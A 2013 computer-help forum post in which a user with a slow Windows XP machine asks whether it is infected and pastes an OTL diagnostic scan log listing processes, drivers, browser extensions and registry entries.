Javascript Disabled Detected

You currently have javascript disabled. Several functions may not work. Please re-enable javascript to access full functionality.

Extensive use of Facebook and viewing other sites slows computer to st

Started by goodseed , Jan 17 2013 08:40 PM

Please log in to reply

#1
goodseed

Posted 17 January 2013 - 08:40 PM

Member

Member
49 posts

While I am in facebook, I view videos in other sites. My computer becomes so slow that I have to shut all sites down and run CClean and registry cleaner before I can use facebook and view other sites, simultaneously. I have run Avast, Spybot, and SuperAntiSpyware but have only found low issues. Do I have something going on?

I first ran OTL full scan but the following is a quick scan:
OTL logfile created on: 1/17/2013 4:05:42 PM - Run 2
OTL by OldTimer - Version 3.2.69.0 Folder = C:\Documents and Settings\Owner\My Documents\Downloads
Windows XP Home Edition Service Pack 3 (Version = 5.1.2600) - Type = NTWorkstation
Internet Explorer (Version = 8.0.6001.18702)
Locale: 00000409 | Country: United States | Language: ENU | Date Format: M/d/yyyy

503.29 Mb Total Physical Memory | 318.13 Mb Available Physical Memory | 63.21% Memory free
1.20 Gb Paging File | 0.45 Gb Available in Paging File | 37.32% Paging File free
Paging file location(s): C:\pagefile.sys 756 1512 [binary data]

%SystemDrive% = C: | %SystemRoot% = C:\WINDOWS | %ProgramFiles% = C:\Program Files
Drive C: | 144.18 Gb Total Space | 74.90 Gb Free Space | 51.95% Space Free | Partition Type: NTFS
Drive D: | 4.85 Gb Total Space | 0.83 Gb Free Space | 17.18% Space Free | Partition Type: FAT32

Computer Name: YOUR-46E94OWX6A | User Name: Owner | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: Current user | Quick Scan
Company Name Whitelist: On | Skip Microsoft Files: On | No Company Name Whitelist: On | File Age = 30 Days

========== Processes (SafeList) ==========

PRC - [2013/01/17 15:45:50 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Documents and Settings\Owner\My Documents\Downloads\OTL.exe
PRC - [2013/01/10 21:17:01 | 000,917,552 | ---- | M] (Mozilla Corporation) -- C:\Program Files\Mozilla Firefox\firefox.exe
PRC - [2012/11/01 13:45:21 | 004,763,008 | ---- | M] (SUPERAntiSpyware.com) -- C:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe
PRC - [2012/10/30 17:50:59 | 004,297,136 | ---- | M] (AVAST Software) -- C:\Program Files\AVAST Software\Avast\AvastUI.exe
PRC - [2012/10/30 17:50:59 | 000,044,808 | ---- | M] (AVAST Software) -- C:\Program Files\AVAST Software\Avast\AvastSvc.exe
PRC - [2011/07/28 17:08:12 | 001,259,376 | ---- | M] () -- C:\Program Files\DivX\DivX Update\DivXUpdate.exe
PRC - [2010/04/30 18:36:16 | 001,742,336 | ---- | M] (Alcatel-Lucent) -- C:\Program Files\Windstream_BCUC\McciTrayApp.exe
PRC - [2009/03/05 15:07:20 | 002,260,480 | ---- | M] (Safer-Networking Ltd.) -- C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe
PRC - [2008/04/13 18:12:19 | 001,033,728 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\explorer.exe
PRC - [2006/11/03 19:20:12 | 000,866,584 | ---- | M] (Microsoft Corporation) -- C:\Program Files\Windows Defender\MSASCui.exe
PRC - [2006/11/03 19:19:58 | 000,013,592 | ---- | M] (Microsoft Corporation) -- C:\Program Files\Windows Defender\MsMpEng.exe
PRC - [2003/11/07 03:50:00 | 000,019,968 | ---- | M] (Logitech Inc.) -- C:\WINDOWS\LOGI_MWX.EXE

========== Modules (No Company Name) ==========

MOD - [2013/01/10 21:16:48 | 003,021,872 | ---- | M] () -- C:\Program Files\Mozilla Firefox\mozjs.dll
MOD - [2012/12/17 01:22:00 | 002,040,320 | ---- | M] () -- C:\Program Files\AVAST Software\Avast\defs\12121700\algo.dll
MOD - [2012/01/03 12:33:35 | 008,527,008 | ---- | M] () -- C:\WINDOWS\system32\Macromed\Flash\NPSWF32.dll
MOD - [2011/07/28 17:09:42 | 000,096,112 | ---- | M] () -- C:\Program Files\DivX\DivX Update\DivXUpdateCheck.dll
MOD - [2011/07/28 17:08:12 | 001,259,376 | ---- | M] () -- C:\Program Files\DivX\DivX Update\DivXUpdate.exe
MOD - [2009/12/20 19:42:16 | 000,176,235 | ---- | M] () -- C:\WINDOWS\system32\Primomonnt.dll
MOD - [2008/04/13 18:11:59 | 000,014,336 | ---- | M] () -- C:\WINDOWS\system32\msdmo.dll

========== Services (SafeList) ==========

SRV - File not found [Disabled | Stopped] -- %SystemRoot%\System32\hidserv.dll -- (HidServ)
SRV - File not found [Auto | Stopped] -- -- (avg9wd)
SRV - File not found [Auto | Stopped] -- -- (avg9emc)
SRV - File not found [On_Demand | Stopped] -- %SystemRoot%\System32\appmgmts.dll -- (AppMgmt)
SRV - File not found [Auto | Stopped] -- -- (!SASCORE)
SRV - [2013/01/10 21:16:50 | 000,115,760 | ---- | M] (Mozilla Foundation) [Disabled | Stopped] -- C:\Program Files\Mozilla Maintenance Service\maintenanceservice.exe -- (MozillaMaintenance)
SRV - [2012/10/30 17:50:59 | 000,044,808 | ---- | M] (AVAST Software) [Auto | Running] -- C:\Program Files\AVAST Software\Avast\AvastSvc.exe -- (avast! Antivirus)
SRV - [2006/11/03 19:19:58 | 000,013,592 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Program Files\Windows Defender\MsMpEng.exe -- (WinDefend)

========== Driver Services (SafeList) ==========

DRV - File not found [Kernel | On_Demand | Stopped] -- -- (WDICA)
DRV - File not found [Kernel | On_Demand | Stopped] -- -- (PDRFRAME)
DRV - File not found [Kernel | On_Demand | Stopped] -- -- (PDRELI)
DRV - File not found [Kernel | On_Demand | Stopped] -- -- (PDFRAME)
DRV - File not found [Kernel | On_Demand | Stopped] -- -- (PDCOMP)
DRV - File not found [Kernel | System | Stopped] -- -- (PCIDump)
DRV - File not found [Kernel | Auto | Stopped] -- -- (mrtRate)
DRV - File not found [Kernel | System | Stopped] -- C:\WINDOWS\system32\MpEngineStore\MpKsl08115bda.sys -- (MpKsl08115bda)
DRV - File not found [Kernel | System | Stopped] -- -- (lbrtfdc)
DRV - File not found [Kernel | System | Stopped] -- -- (i2omgmt)
DRV - File not found [Kernel | System | Stopped] -- -- (Changer)
DRV - [2012/10/30 17:51:58 | 000,738,504 | ---- | M] (AVAST Software) [File_System | System | Running] -- C:\WINDOWS\System32\drivers\aswSnx.sys -- (aswSnx)
DRV - [2012/10/30 17:51:58 | 000,361,032 | ---- | M] (AVAST Software) [Kernel | System | Running] -- C:\WINDOWS\System32\drivers\aswSP.sys -- (aswSP)
DRV - [2012/10/30 17:51:58 | 000,054,232 | ---- | M] (AVAST Software) [Kernel | System | Running] -- C:\WINDOWS\System32\drivers\aswTdi.sys -- (aswTdi)
DRV - [2012/10/30 17:51:58 | 000,035,928 | ---- | M] (AVAST Software) [Kernel | System | Running] -- C:\WINDOWS\System32\drivers\aswRdr.sys -- (AswRdr)
DRV - [2012/10/30 17:51:57 | 000,097,608 | ---- | M] (AVAST Software) [File_System | Auto | Running] -- C:\WINDOWS\System32\drivers\aswmon2.sys -- (aswMon2)
DRV - [2012/10/30 17:51:56 | 000,025,256 | ---- | M] (AVAST Software) [Kernel | System | Running] -- C:\WINDOWS\System32\drivers\aavmker4.sys -- (Aavmker4)
DRV - [2012/10/30 17:51:56 | 000,021,256 | ---- | M] (AVAST Software) [File_System | Auto | Running] -- C:\WINDOWS\System32\drivers\aswFsBlk.sys -- (aswFsBlk)
DRV - [2011/07/22 10:27:02 | 000,012,880 | ---- | M] (SUPERAdBlocker.com and SUPERAntiSpyware.com) [Kernel | System | Running] -- C:\Program Files\SUPERAntiSpyware\sasdifsv.sys -- (SASDIFSV)
DRV - [2011/07/12 15:55:22 | 000,067,664 | ---- | M] (SUPERAdBlocker.com and SUPERAntiSpyware.com) [Kernel | System | Running] -- C:\Program Files\SUPERAntiSpyware\SASKUTIL.SYS -- (SASKUTIL)
DRV - [2010/06/30 02:27:08 | 000,049,904 | R--- | M] (Avanquest Software) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\drivers\BVRPMPR5.SYS -- (BVRPMPR5)
DRV - [2010/04/30 18:32:06 | 000,020,096 | ---- | M] (Printing Communications Assoc., Inc. (PCAUSA)) [Kernel | On_Demand | Stopped] -- C:\Program Files\Common Files\Motive\MRESP50.sys -- (MRESP50)
DRV - [2010/04/30 18:30:56 | 000,021,248 | ---- | M] (Printing Communications Assoc., Inc. (PCAUSA)) [Kernel | On_Demand | Stopped] -- C:\Program Files\Common Files\Motive\MREMP50.sys -- (MREMP50)
DRV - [2009/05/14 14:20:02 | 000,030,656 | ---- | M] (Eutron) [Kernel | System | Running] -- C:\WINDOWS\system32\drivers\eusk2par.sys -- (eusk2par)
DRV - [2005/12/12 17:27:00 | 000,019,072 | ---- | M] (Hewlett-Packard Company) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\drivers\PS2.sys -- (Ps2)
DRV - [2004/11/22 17:36:40 | 000,018,003 | ---- | M] (Motive, Inc.) [Kernel | On_Demand | Stopped] -- C:\Program Files\Common Files\Motive\MRENDIS5.sys -- (MRENDIS5)
DRV - [2004/11/22 17:36:34 | 000,019,345 | ---- | M] (Motive, Inc.) [Kernel | On_Demand | Stopped] -- C:\Program Files\Common Files\Motive\MREMPR5.sys -- (MREMPR5)
DRV - [2004/06/29 09:07:18 | 001,268,204 | ---- | M] (Agere Systems) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\AGRSM.sys -- (AgereSoftModem)
DRV - [2004/05/12 03:36:50 | 000,043,672 | ---- | M] (Oak Technology Inc.) [Kernel | System | Running] -- C:\WINDOWS\System32\drivers\AFS2K.SYS -- (AFS2K)
DRV - [2004/05/05 07:02:12 | 002,155,200 | ---- | M] (Realtek Semiconductor Corp.) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\RtkHDAud.sys -- (IntcAzAudAddService)
DRV - [2004/01/02 21:05:48 | 000,011,520 | ---- | M] (Silicon Integrated Systems Corporation) [Kernel | System | Running] -- C:\WINDOWS\system32\drivers\srvkp.sys -- (SiSkp)
DRV - [2004/01/02 20:20:40 | 000,432,000 | ---- | M] (Silicon Integrated Systems Corporation) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\drivers\sisgrp.sys -- (SiS315)
DRV - [2003/12/02 19:23:20 | 000,142,336 | ---- | M] (Promise Technology, Inc.) [Kernel | Boot | Running] -- C:\WINDOWS\system32\drivers\Fasttx2k.sys -- (fasttx2k)
DRV - [2003/11/07 03:50:00 | 000,070,798 | ---- | M] (Logitech, Inc.) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\drivers\LMouFlt2.Sys -- (LMouFlt2)
DRV - [2003/11/07 03:50:00 | 000,051,486 | ---- | M] (Logitech, Inc.) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\drivers\L8042pr2.Sys -- (L8042pr2)
DRV - [2003/09/19 00:47:00 | 000,010,368 | ---- | M] (Padus, Inc.) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\pfc.sys -- (Pfc)
DRV - [2003/07/18 17:58:20 | 000,036,992 | ---- | M] (Silicon Integrated Systems Corporation) [Kernel | Boot | Running] -- C:\WINDOWS\system32\drivers\SISAGPX.SYS -- (SISAGP)
DRV - [2003/07/02 12:42:00 | 000,027,904 | ---- | M] (VIA Technologies, Inc.) [Kernel | Boot | Running] -- C:\WINDOWS\system32\drivers\VIAAGP1.SYS -- (viaagp1)
DRV - [2002/10/04 18:04:10 | 000,046,976 | ---- | M] (Realtek Semiconductor Corporation ) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\R8139n51.sys -- (rtl8139)

========== Standard Registry (SafeList) ==========

========== Internet Explorer ==========

IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Search,Default_Search_URL = http://www.google.com/ie
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Search,SearchAssistant = http://www.google.com/ie
IE - HKLM\..\SearchScopes,DefaultScope = {6A1806CD-94D4-4689-BA73-E35EA1EA9990}
IE - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://search.live.c...ferrer:source?}
IE - HKLM\..\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990}: "URL" = http://www.google.co...g}&sourceid=ie7
IE - HKLM\..\SearchScopes\{CCC7A320-B3CA-4199-B1A6-9F516DD69829}: "URL" = http://us.yhs.search...p={searchTerms}

IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Search Bar = http://www.google.com/ie
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Search Page = http://www.google.com
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.bing.com/
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Search,SearchAssistant = http://www.google.com/ie
IE - HKCU\..\SearchScopes,DefaultScope = {039200FA-A7A5-4085-A14A-AAC65209AC5E}
IE - HKCU\..\SearchScopes\{039200FA-A7A5-4085-A14A-AAC65209AC5E}: "URL" = http://www.bing.com/...rc=IE-SearchBox
IE - HKCU\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://search.live.c...Box&Form=IE8SRC
IE - HKCU\..\SearchScopes\{442DC793-0C09-4FE7-B9D9-BE3B9888E05E}: "URL" = http://search.mywebs...s={searchTerms}
IE - HKCU\..\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990}: "URL" = http://www.google.co...&rlz=1I7SUNA_en
IE - HKCU\..\SearchScopes\{CCC7A320-B3CA-4199-B1A6-9F516DD69829}: "URL" = http://search.avg.co...e}&iy=&ychte=us
IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyOverride" = <local>

========== FireFox ==========

FF - prefs.js..browser.search.order.1: "Search"
FF - prefs.js..browser.search.selectedEngine: "Search"
FF - prefs.js..browser.startup.homepage: "www.startpage.com"
FF - prefs.js..extensions.enabledAddons: %7B23fcfd51-4958-4f00-80a3-ae97e717ed8b%7D:2.1.2.145
FF - prefs.js..extensions.enabledAddons: %7B972ce4c6-7e08-4474-a285-3208198ce6fd%7D:18.0
FF - prefs.js..extensions.enabledItems: [email protected]:1.0
FF - prefs.js..extensions.enabledItems: {ABDE892B-13A8-4d1b-88E6-365A6E755758}:1.0
FF - prefs.js..extensions.enabledItems: {3f963a5b-e555-4543-90e2-c3908898db71}:10.0.0.1167
FF - prefs.js..keyword.URL: "http://search.mywebs...10101070100&s="

FF - user.js..browser.search.selectedEngine: "Search"
FF - user.js..browser.search.order.1: "Search"
FF - user.js..keyword.URL: "http://search.mywebs...10101070100&s="

FF - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\WINDOWS\system32\Macromed\Flash\NPSWF32.dll ()
FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=: File not found
FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=1.0: C:\Program Files\iTunes\Mozilla Plugins\npitunes.dll ()
FF - HKLM\Software\MozillaPlugins\@bittorrent.com/BitTorrentDNA: C:\Program Files\DNA\plugins\npbtdna.dll (BitTorrent, Inc.)
FF - HKLM\Software\MozillaPlugins\@divx.com/DivX Browser Plugin,version=1.0.0: C:\Program Files\DivX\DivX Plus Web Player\npdivx32.dll (DivX, LLC)
FF - HKLM\Software\MozillaPlugins\@divx.com/DivX Content Upload Plugin,version=1.0.0: File not found
FF - HKLM\Software\MozillaPlugins\@divx.com/DivX Player Plugin,version=1.0.0: File not found
FF - HKLM\Software\MozillaPlugins\@divx.com/DivX VOD Helper,version=1.0.0: C:\Program Files\DivX\DivX OVS Helper\npovshelper.dll (DivX, LLC.)
FF - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: c:\Program Files\Microsoft Silverlight\5.1.10411.0\npctrl.dll ( Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/WPF,version=3.5: c:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@Motive.com/NpMotive,version=1.0: C:\Program Files\Common Files\Motive\npMotive.dll (Alcatel-Lucent)
FF - HKLM\Software\MozillaPlugins\@real.com/RhapsodyPlayerEngine,version=1.1: File not found
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=3: C:\Program Files\Google\Update\1.3.21.123\npGoogleUpdate3.dll (Google Inc.)
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=8: File not found
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=9: C:\Program Files\Google\Update\1.3.21.123\npGoogleUpdate3.dll (Google Inc.)
FF - HKCU\Software\MozillaPlugins\@adobe.com/FlashPlayer: File not found

FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\{23fcfd51-4958-4f00-80a3-ae97e717ed8b}: C:\Program Files\DivX\DivX Plus Web Player\firefox\DivXHTML5 [2011/12/20 09:19:45 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\[email protected]: C:\Program Files\AVAST Software\Avast\WebRep\FF [2013/01/14 19:24:00 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 18.0\extensions\\Components: C:\Program Files\Mozilla Firefox\components [2013/01/10 21:17:06 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 18.0\extensions\\Plugins: C:\Program Files\Mozilla Firefox\plugins

[2008/08/27 05:09:54 | 000,000,000 | ---D | M] (No name found) -- C:\Documents and Settings\Owner\Application Data\Mozilla\Extensions
[2013/01/11 09:03:21 | 000,000,000 | ---D | M] (No name found) -- C:\Documents and Settings\Owner\Application Data\Mozilla\Firefox\Profiles\5qu4u2c8.default\extensions
[2013/01/11 09:03:21 | 000,000,000 | ---D | M] ("Codec-V") -- C:\Documents and Settings\Owner\Application Data\Mozilla\Firefox\Profiles\5qu4u2c8.default\extensions\[email protected]
[2013/01/11 09:03:20 | 000,000,000 | ---D | M] (No name found) -- C:\Documents and Settings\Owner\Application Data\Mozilla\Firefox\Profiles\5qu4u2c8.default\extensions\[email protected]\chrome\content\extensionCode
[2012/02/12 09:30:04 | 000,020,591 | ---- | M] () (No name found) -- C:\Documents and Settings\Owner\Application Data\Mozilla\Firefox\Profiles\5qu4u2c8.default\extensions\{20a82645-c095-46ed-80e3-08825760534b}.xpi
[2013/01/10 21:14:59 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files\Mozilla Firefox\extensions
[2011/12/20 09:19:45 | 000,000,000 | ---D | M] (DivX Plus Web Player HTML5 <video>) -- C:\PROGRAM FILES\DIVX\DIVX PLUS WEB PLAYER\FIREFOX\DIVXHTML5
[2013/01/10 21:17:04 | 000,262,704 | ---- | M] (Mozilla Foundation) -- C:\Program Files\mozilla firefox\components\browsercomps.dll
[2012/10/12 21:17:06 | 000,002,465 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\bing.xml
[2012/10/12 21:17:06 | 000,002,058 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\twitter.xml

========== Chrome ==========

CHR - homepage: http://www.google.com
CHR - default_search_provider: Google (Enabled)
CHR - default_search_provider: search_url = {google:baseURL}search?q={searchTerms}&{google:RLZ}{google:acceptedSuggestion}{google:originalQueryForSuggestion}{google:assistedQueryStats}{google:searchFieldtrialParameter}sourceid=chrome&ie={inputEncoding}
CHR - default_search_provider: suggest_url = {google:baseSuggestURL}search?{google:searchFieldtrialParameter}client=chrome&hl={language}&q={searchTerms}&sugkey={google:suggestAPIKeyParameter}
CHR - homepage: http://www.google.com
CHR - plugin: Shockwave Flash (Enabled) = C:\Program Files\Google\Chrome\Application\24.0.1312.52\PepperFlash\pepflashplayer.dll
CHR - plugin: Chrome Remote Desktop Viewer (Enabled) = internal-remoting-viewer
CHR - plugin: Native Client (Enabled) = C:\Program Files\Google\Chrome\Application\24.0.1312.52\ppGoogleNaClPluginChrome.dll
CHR - plugin: Chrome PDF Viewer (Enabled) = C:\Program Files\Google\Chrome\Application\24.0.1312.52\pdf.dll
CHR - plugin: Adobe Acrobat (Enabled) = C:\Program Files\Adobe\Reader 9.0\Reader\Browser\nppdf32.dll
CHR - plugin: QuickTime Plug-in 7.5.5 (Enabled) = C:\Program Files\QuickTime\plugins\npqtplugin.dll
CHR - plugin: QuickTime Plug-in 7.5.5 (Enabled) = C:\Program Files\QuickTime\plugins\npqtplugin2.dll
CHR - plugin: QuickTime Plug-in 7.5.5 (Enabled) = C:\Program Files\QuickTime\plugins\npqtplugin3.dll
CHR - plugin: QuickTime Plug-in 7.5.5 (Enabled) = C:\Program Files\QuickTime\plugins\npqtplugin4.dll
CHR - plugin: QuickTime Plug-in 7.5.5 (Enabled) = C:\Program Files\QuickTime\plugins\npqtplugin5.dll
CHR - plugin: QuickTime Plug-in 7.5.5 (Enabled) = C:\Program Files\QuickTime\plugins\npqtplugin6.dll
CHR - plugin: QuickTime Plug-in 7.5.5 (Enabled) = C:\Program Files\QuickTime\plugins\npqtplugin7.dll
CHR - plugin: Microsoft\u00AE DRM (Enabled) = C:\Program Files\Windows Media Player\npdrmv2.dll
CHR - plugin: Windows Media Player Plug-in Dynamic Link Library (Enabled) = C:\Program Files\Windows Media Player\npdsplay.dll
CHR - plugin: Microsoft\u00AE DRM (Enabled) = C:\Program Files\Windows Media Player\npwmsdrm.dll
CHR - plugin: Motive Plugin (Enabled) = C:\Program Files\Common Files\Motive\npMotive.dll
CHR - plugin: DNA Plug-in (Enabled) = C:\Program Files\DNA\plugins\npbtdna.dll
CHR - plugin: DivX VOD Helper Plug-in (Enabled) = C:\Program Files\DivX\DivX OVS Helper\npovshelper.dll
CHR - plugin: DivX Plus Web Player (Enabled) = C:\Program Files\DivX\DivX Plus Web Player\npdivx32.dll
CHR - plugin: Google Update (Enabled) = C:\Program Files\Google\Update\1.3.21.123\npGoogleUpdate3.dll
CHR - plugin: iTunes Application Detector (Enabled) = C:\Program Files\iTunes\Mozilla Plugins\npitunes.dll
CHR - plugin: Shockwave Flash (Enabled) = C:\WINDOWS\system32\Macromed\Flash\NPSWF32.dll
CHR - plugin: Silverlight Plug-In (Enabled) = c:\Program Files\Microsoft Silverlight\5.1.10411.0\npctrl.dll
CHR - plugin: Windows Presentation Foundation (Enabled) = c:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll
CHR - Extension: Google Docs = C:\Documents and Settings\Owner\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.0.0.6_0\
CHR - Extension: Google Docs = C:\Documents and Settings\Owner\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.4_0\
CHR - Extension: Google Drive = C:\Documents and Settings\Owner\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.2_0\
CHR - Extension: Google Drive = C:\Documents and Settings\Owner\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.3_0\
CHR - Extension: YouTube = C:\Documents and Settings\Owner\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.5_0\
CHR - Extension: Google Search = C:\Documents and Settings\Owner\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\
CHR - Extension: avast! WebRep = C:\Documents and Settings\Owner\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\icmlaeflemplmjndnaapfdbbnpncnbda\7.0.1474_0\
CHR - Extension: Codec-V = C:\Documents and Settings\Owner\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\jpnbdefcbnoefmmcpelplabbkfmfhlho\1.14.36_0\
CHR - Extension: Codec-V = C:\Documents and Settings\Owner\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\jpnbdefcbnoefmmcpelplabbkfmfhlho\1.20.67_0\crossrider
CHR - Extension: Codec-V = C:\Documents and Settings\Owner\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\jpnbdefcbnoefmmcpelplabbkfmfhlho\1.20.67_0\
CHR - Extension: DivX Plus Web Player HTML5 \u003Cvideo\u003E = C:\Documents and Settings\Owner\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\nneajnkjbffgblleaoojgaacokifdkhm\2.1.2.145_0\
CHR - Extension: Gmail = C:\Documents and Settings\Owner\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\7_0\

O1 HOSTS File: ([2010/12/22 18:34:40 | 000,000,098 | ---- | M]) - C:\WINDOWS\system32\drivers\etc\Hosts
O1 - Hosts: 127.0.0.1 localhost
O1 - Hosts: ::1 localhost
O2 - BHO: (no name) - {02478D38-C3F9-4efb-9B51-7695ECA05670} - No CLSID value found.
O2 - BHO: (Adobe PDF Reader Link Helper) - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll (Adobe Systems Incorporated)
O2 - BHO: (DivX Plus Web Player HTML5 <video>) - {326E768D-4182-46FD-9C16-1449A49795F4} - C:\Program Files\DivX\DivX Plus Web Player\ie\DivXHTML5\DivXHTML5.dll (DivX, LLC)
O2 - BHO: (Spybot-S&D IE Protection) - {53707962-6F74-2D53-2644-206D7942484F} - C:\Program Files\Spybot - Search & Destroy\SDHelper.dll (Safer Networking Limited)
O2 - BHO: (Java™ Plug-In SSV Helper) - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre6\bin\ssv.dll (Sun Microsystems, Inc.)
O2 - BHO: (avast! WebRep) - {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll (AVAST Software)
O3 - HKLM\..\Toolbar: (no name) - - No CLSID value found.
O3 - HKLM\..\Toolbar: (avast! WebRep) - {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll (AVAST Software)
O3 - HKLM\..\Toolbar: (HP view) - {B2847E28-5D7D-4DEB-8B67-05D28BCF79F5} - c:\Program Files\HP\Digital Imaging\bin\hpdtlk02.dll (Hewlett-Packard Company)
O3 - HKLM\..\Toolbar: (no name) - {CCC7A320-B3CA-4199-B1A6-9F516DD69829} - No CLSID value found.
O3 - HKLM\..\Toolbar: (no name) - Locked - No CLSID value found.
O3 - HKCU\..\Toolbar\ShellBrowser: (no name) - {42CDD1BF-3FFB-4238-8AD1-7859DF00B1D6} - No CLSID value found.
O3 - HKCU\..\Toolbar\ShellBrowser: (HP view) - {B2847E28-5D7D-4DEB-8B67-05D28BCF79F5} - c:\Program Files\HP\Digital Imaging\bin\hpdtlk02.dll (Hewlett-Packard Company)
O3 - HKCU\..\Toolbar\WebBrowser: (HP view) - {B2847E28-5D7D-4DEB-8B67-05D28BCF79F5} - c:\Program Files\HP\Digital Imaging\bin\hpdtlk02.dll (Hewlett-Packard Company)
O4 - HKLM..\Run: [avast] C:\Program Files\AVAST Software\Avast\avastUI.exe (AVAST Software)
O4 - HKLM..\Run: [DivXUpdate] C:\Program Files\DivX\DivX Update\DivXUpdate.exe ()
O4 - HKLM..\Run: [HPDJ Taskbar Utility] C:\WINDOWS\system32\spool\drivers\w32x86\3\hpztsb07.exe (HP)
O4 - HKLM..\Run: [Logitech Utility] C:\WINDOWS\LOGI_MWX.EXE (Logitech Inc.)
O4 - HKLM..\Run: [Windows Defender] C:\Program Files\Windows Defender\MSASCui.exe (Microsoft Corporation)
O4 - HKLM..\Run: [Windstream_BCUC_McciTrayApp] C:\Program Files\Windstream_BCUC\McciTrayApp.exe (Alcatel-Lucent)
O4 - HKCU..\Run: [SpybotSD TeaTimer] C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe (Safer-Networking Ltd.)
O4 - HKCU..\Run: [SUPERAntiSpyware] C:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe (SUPERAntiSpyware.com)
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: HonorAutoRunSetting = 1
O7 - HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 145
O9 - Extra 'Tools' menuitem : Spybot - Search & Destroy Configuration - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\Program Files\Spybot - Search & Destroy\SDHelper.dll (Safer Networking Limited)
O10 - NameSpace_Catalog5\Catalog_Entries\000000000004 [] - C:\Program Files\Bonjour\mdnsNSP.dll (Apple Inc.)
O16 - DPF: {17492023-C23A-453E-A040-C7C580BBF700} http://download.micr...heckControl.cab (Windows Genuine Advantage Validation Tool)
O16 - DPF: {5ED80217-570B-4DA9-BF44-BE107C0EC166} http://cdn.scan.onec...lscbase6770.cab (Windows Live Safety Center Base Module)
O16 - DPF: {6E32070A-766D-4EE6-879C-DC1FA91D2FC3} http://www.update.mi...b?1192293460281 (MUWebControl Class)
O16 - DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} http://java.sun.com/...indows-i586.cab (Java Plug-in 1.6.0_11)
O16 - DPF: {8FFBE65D-2C9C-4669-84BD-5829DC0B603C} http://fpdownload.ma...t/ultrashim.cab (Reg Error: Key error.)
